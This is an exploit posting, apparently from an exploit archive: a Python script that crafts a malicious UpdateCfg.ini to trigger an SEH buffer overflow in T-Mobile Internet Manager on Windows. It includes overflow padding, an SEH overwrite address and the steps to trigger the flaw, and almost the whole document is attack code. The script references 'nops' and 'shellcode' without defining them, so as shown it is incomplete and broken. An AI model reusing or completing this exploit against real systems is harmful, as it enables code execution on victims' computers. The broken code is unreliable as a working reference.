facebook facebook twitter rss

T-Mobile Internet Manager SEH Buffer Overflow

Author: Oussama911 , Published: 14-01-2015
#!/usr/bin/python
# coding: utf-8
#Exploit Title:T-Mobile Internet Manager SEH Buffer Overflow
#Version:Internet Manager Software für Windows (TMO_PCV1.0.5B06)
#Software for usb Wireless:T-Mobile web'n'walk Stick Fusion
#Homepage:https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html
#Software Link:https://www.t-mobile.de/downloads/neu/winui.zip
#Found:8.01.2015
#Exploit Author: Oussama911
#Greetz : Anonymous Aleria - Virus28 Team - Dz Mafia - Toxic dz
#Contact : www.AnonymousAlgeria-Gov.gq - fb.me/Anonymous.goverments
#Tested on: Win-7 En, Win-8.1 DE-Enterprise, Win-XPSp3 EN
#Video poc:http://bit.ly/17DhwSR
print "[*]Copy UpdateCfg.ini to C:\Program Files\T-Mobile\InternetManager_Z\Bin\n"
print "[*]Open Program and go to Menu-Options \n"
print "[*]Click Update and press Now look for Update\n"
from struct import pack
junk="\x41" * 18073
nseh="\xeb\x06\x90\x90"
seh=pack('<I',0x6900CEAE)#6900CEAE 5F POP EDI intl.dll
header = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x0a"
header += "\x0a\x55\x50\x44\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x0a\x0a\x5b\x53\x65\x72\x76\x69"
header += "\x63\x65\x5d\x0a\x0a\x0a\x0a\x6d\x65\x74\x61\x63\x6f\x6d\x3d\x74\x77\x69\x74\x74\x65\x72\x2e\x63\x6f\x6d\x2f\x6d\x33\x74"
header += "\x61\x63\x30\x6d\x0a\x0a\x0a\x0a\x53\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73"
header += "\x70\x78\x0a\x0a\x0a\x0a\x55\x70\x64\x61\x74\x65\x52\x65\x70\x6f\x72\x74\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x52\x65\x73\x75\x6c\x74\x52\x65"
header += "\x70\x6f\x72\x74\x2e\x61\x73\x70\x78"+junk+nseh+seh+nops+shellcode+'\n\n'
footer = "\x0a\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48"
footer += "\x3d\x2e\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33"
footer += "\x30\x30\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54"
footer += "\x5f\x54\x49\x4d\x45\x4f\x55\x54\x3d\x32\x30\x0a\x0a\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x0a"
footer += "\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53\x79\x73\x3d\x31\x0a"
exploit = header + footer
filename = "UpdateCfg.ini"
file = open(filename , "w")
file.write(exploit)
file.close()

# milw00rm.com [2015-01-14]

Like us on Facebook :